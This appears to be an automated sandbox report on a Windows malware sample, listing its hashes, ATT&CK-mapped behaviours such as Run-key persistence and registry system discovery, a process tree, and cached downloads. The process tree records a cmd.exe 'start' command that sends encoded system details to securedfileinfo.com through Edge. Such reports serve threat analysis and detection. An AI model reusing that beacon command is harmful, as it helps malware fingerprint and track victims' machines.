bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79

Analysis

max time kernel
152s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27/11/2022, 08:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe
Size

143KB
MD5

e42131e41fc933f6d581b129965f9ba2
SHA1

84adbc7661df1b1aabf1a04e290007fad93c6e22
SHA256

bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79
SHA512

8a0f22c0c35e72b39a0bc23a34c6e0392f65c4bd058bae1738cc98eba346529236c5de3b6b6c52f17c679ea78a12e469832a204c98c955c7c537f1c881100ec7
SSDEEP

3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45DF5V:pe9IB83ID5jV

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221128050227.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f500711c-ba60-4c3b-b913-0d268890aee3.tmp	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1820	msedge.exe
1820	msedge.exe
4852	msedge.exe
4852	msedge.exe
4620	identity_helper.exe
4620	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4852	msedge.exe
4852	msedge.exe
4852	msedge.exe
4852	msedge.exe
4852	msedge.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2492	bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe
4852	msedge.exe
4852	msedge.exe
4852	msedge.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2492	bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 2136	2492	bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe	81
PID 2492 wrote to memory of 2136	2492	bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe	81
PID 2492 wrote to memory of 2136	2492	bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe	81
PID 2136 wrote to memory of 4852	2136	cmd.exe	83
PID 2136 wrote to memory of 4852	2136	cmd.exe	83
PID 4852 wrote to memory of 928	4852	msedge.exe	85
PID 4852 wrote to memory of 928	4852	msedge.exe	85
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 4468	4852	msedge.exe	88
PID 4852 wrote to memory of 1820	4852	msedge.exe	89
PID 4852 wrote to memory of 1820	4852	msedge.exe	89
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91
PID 4852 wrote to memory of 4616	4852	msedge.exe	91

C:\Users\Admin\AppData\Local\Temp\bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe
"C:\Users\Admin\AppData\Local\Temp\bd34a3e00570e70db111a08470a39772df00d441aea26509b47bc283eddace79.exe"
1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=4300109^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt43^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=4300109&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt43|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p1
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff3b0446f8,0x7fff3b044708,0x7fff3b044718
      4⤵
      PID:928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
      4⤵
      PID:4468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1820
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
      4⤵
      PID:4616
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      4⤵
      PID:4772
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
      4⤵
      PID:5108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4868 /prefetch:8
      4⤵
      PID:5064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
      4⤵
      PID:944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5076 /prefetch:8
      4⤵
      PID:1176
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
      4⤵
      PID:2316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
      4⤵
      PID:1632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6636 /prefetch:8
      4⤵
      PID:4392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:2972
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x280,0x284,0x288,0x240,0x28c,0x7ff76aae5460,0x7ff76aae5470,0x7ff76aae5480
        5⤵
        
        PID:1580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,11855949257742105680,9215444191983330461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6636 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4620

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5036

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
f2080851a6780703a0f3764645202ce1

SHA1
6e16ec7fe0404b0fe43ebd271ca47ffba9fc9588

SHA256
d3969401d4fc819669b9ce997251cc41d4883a31c4f43271b088944fadce3a83

SHA512
50e5661d1b5c66073c34d164b49733d7c1c1d7b2782611596646b60dae81321c5c92f9e64dce980cea8306b29db6136e582dcc07f1a951580c1f9f4d69643121

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
472B

MD5
9f6cc8d3fe9092a6d3901e873a87fd87

SHA1
2e0aac117a4cc57596efb3d6f6624c269f94b031

SHA256
e73982e62b92abac3d15b161f4525448cc2bc8b9bacefdcbfc6f87b74ec372e4

SHA512
9736a099967d7ad595439768e45c633ff7d34de92f7cb0c19cd3d4590c4a6dd4fedfcd1b5617c81652e61f4ffe919057507f622f4c6d8d626cfc40234ad2c757

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
f569e1d183b84e8078dc456192127536

SHA1
30c537463eed902925300dd07a87d820a713753f

SHA256
287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413

SHA512
49553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
7143f6c0c61fb605ba9970d3dae8e81c

SHA1
05bc92455bf77b25412c6974c422b22d3482144d

SHA256
692d2bd5ef4a92f7a8839d9d1e556a8fb9e3d48aa907f66c0bb59ded20d1a744

SHA512
0951e7a4b35a6e075d4be5fea9d9d8c188ee98a0461b3d4f53590bceba5b2161cc5d9ac6c0c2b71dc5cadccb8d950a5c4b2f64d8a348f3f05d1d9ceba28defef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
402B

MD5
4bc0f3e8d6feb79c95a863f1241e39ae

SHA1
57b152bb95b121dd6a64d528470acf67c4d51036

SHA256
ebc0f4ba70da92d335389425d2920c93e493631ecfd01808acc649110ac53079

SHA512
1d495d518ba2929eda077d9736de31cfad50154e96561d72928129100672ec5dde6ca51e670a3ff162e4c9bd8f79abc68717ad52f9682a0fce2dfea3343fa754

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
392B

MD5
1ef55a5105b815dc64fd65b637209b46

SHA1
02aaa0112d118189beaca3c2b89ff29ebb04780f

SHA256
3860d4b94ae50b895ad6ff46ddcc6751085169a5d62fb880d16290333539e067

SHA512
906c7b4034312fae33426be29a1617c181c2494fbe95e993fd3ed3f90191fcf8a25b5138bf02a93bf361cd577abc7e2912750c7f0ce6eaae8db1ea8f459ae441

Download Submit